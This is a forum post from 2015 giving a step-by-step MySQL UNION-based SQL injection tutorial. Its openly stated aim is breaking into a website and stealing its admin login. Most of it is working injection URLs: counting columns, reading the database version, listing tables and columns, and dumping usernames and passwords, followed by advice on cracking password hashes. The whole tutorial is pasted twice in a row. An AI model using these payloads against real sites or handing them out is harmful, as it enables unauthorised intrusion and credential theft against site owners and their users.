Void
03-17-2015, 12:32 PM
Mysql has 2 types only as mentioned above.you need to know the following things about the DB you are attacking-
# Number of columns
# Table names
# column names
# Let's start with union Attack, the most common, every n00b should no it :p-
=> http://test.com/index.php?id=1 order by 10--
^ This gives me an error
Let's again try
=> http://test.com/index.php?id=1 order by 7--
^ This gives me an error
Let's try again
=> http://test.com/index.php?id=1 order by 5--
Whoa !! the page is Loading normally
It means, Number of columns => 5
you can do it with mssql as well.
# Now the next part-
I'm using union select statement.
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't gives you anything, change the first part of the query to a negative value.
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5--
It'll show some number on you screen. In my case it is 2. Now we know that column 2 will echo data back to us. :D
# getting Mysql version
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you do not get with this try this-
=> http://test.com/index.php?id=-1 union select 1,version()),3,4,5--
Now you will get get the version name
it can be-
# 5+
# 5>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Table extraction for version 5+ :
=> http://test.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--
It'll show a lot of tables, if you want to get into the site, usually you need to get the admin's login info :D
So, In my case I need to exploit into a table named => admin
which contains information, I need :D
Now I got the Tables names & I need to extract the column names from them so the query will be-
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--
This will show you the column names inside the table Admin. if it gives you an error you need to change the text value of admin to mysql char.
I use hackbar, a Firefox addon to do so.
so char of admin is =>CHAR(97, 100, 109, 105, 110)
therefore the query will be-
=>
http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
It show the columns names to me. In my case they are-
# user_name
# user_password
# sex
# uid
We only need to know username & pass so we reject the rest two. Okay ? :D
The next query will be for extracting the final data I need- :D
=> http://test.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--
where 0x3a is the hex value of => :
VOILA !
I got the username & pass, it is => admin:password
password can also be encrypted. So you can use few online decrypters or a software I know => Password Pro
# Number of columns
# Table names
# column names
# Let's start with union Attack, the most common, every n00b should no it :p-
=> http://test.com/index.php?id=1 order by 10--
^ This gives me an error
Let's again try
=> http://test.com/index.php?id=1 order by 7--
^ This gives me an error
Let's try again
=> http://test.com/index.php?id=1 order by 5--
Whoa !! the page is Loading normally
It means, Number of columns => 5
you can do it with mssql as well.
# Now the next part-
I'm using union select statement.
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't gives you anything, change the first part of the query to a negative value.
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5--
It'll show some number on you screen. In my case it is 2. Now we know that column 2 will echo data back to us. :D
# getting Mysql version
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you do not get with this try this-
=> http://test.com/index.php?id=-1 union select 1,version()),3,4,5--
Now you will get get the version name
it can be-
# 5+
# 5>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Table extraction for version 5+ :
=> http://test.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--
It'll show a lot of tables, if you want to get into the site, usually you need to get the admin's login info :D
So, In my case I need to exploit into a table named => admin
which contains information, I need :D
Now I got the Tables names & I need to extract the column names from them so the query will be-
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--
This will show you the column names inside the table Admin. if it gives you an error you need to change the text value of admin to mysql char.
I use hackbar, a Firefox addon to do so.
so char of admin is =>CHAR(97, 100, 109, 105, 110)
therefore the query will be-
=>
http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
It show the columns names to me. In my case they are-
# user_name
# user_password
# sex
# uid
We only need to know username & pass so we reject the rest two. Okay ? :D
The next query will be for extracting the final data I need- :D
=> http://test.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--
where 0x3a is the hex value of => :
VOILA !
I got the username & pass, it is => admin:password
password can also be encrypted. So you can use few online decrypters or a software I know => Password Pro